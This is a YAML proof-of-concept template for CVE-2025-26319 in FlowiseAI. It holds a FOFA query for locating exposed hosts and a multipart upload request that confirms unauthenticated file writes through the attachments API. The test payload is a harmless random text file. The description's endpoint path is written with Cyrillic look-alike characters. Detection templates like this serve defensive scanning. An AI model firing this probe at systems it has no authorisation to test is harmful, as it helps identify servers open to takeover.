CVE-2025-26319: FlowiseAI 未授权任意文件写入漏洞

id: CVE-2025-26319
info:
  name: FlowiseAI 未授权任意文件写入漏洞
  author: avic123
  severity: critical
  verified: true
  description: |
    FlowiseAI 是一款开源的低代码/无代码工具，用于快速构建基于大语言模型（LLM）的应用程序。该漏洞存在于 Flowise 的 /арi/v1/аttасhmеntѕ 中，允许未经身份验证的攻击者通过“知识上传”功能将任意文件上传到托管代理的服务器，此缺陷可能使攻击者能够通过上传恶意文件、脚本、配置文件甚至 SSH 密钥来远程控制整个服务器。
    fofa：app="FlowiseAI"
  reference:
    - https://mp.weixin.qq.com/s/Htyu1_SpOvAYb1VaZDYGjA
  tags: cve,cve2025,flowiseAI,fileupload
  created: 2025/06/10

set:
  hostname: request.url.host
  randstr: randomLowercase(8)
  rboundary: randomLowercase(33)
rules:
  r0:
    request:
      method: POST
      path: /api/v1/attachments/test/test
      headers:
        Content-Type: multipart/form-data; boundary=--------{{rboundary}}
      body: |

        ----------{{rboundary}}
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.txt"
        Content-Type: text/plain 

        {{randstr}}
        ----------{{rboundary}}--
    expression: response.status == 200 && response.body.bcontains(b'"name"') && response.body.bcontains(b'"content":') && response.body.bcontains(bytes(randstr))

expression: r0()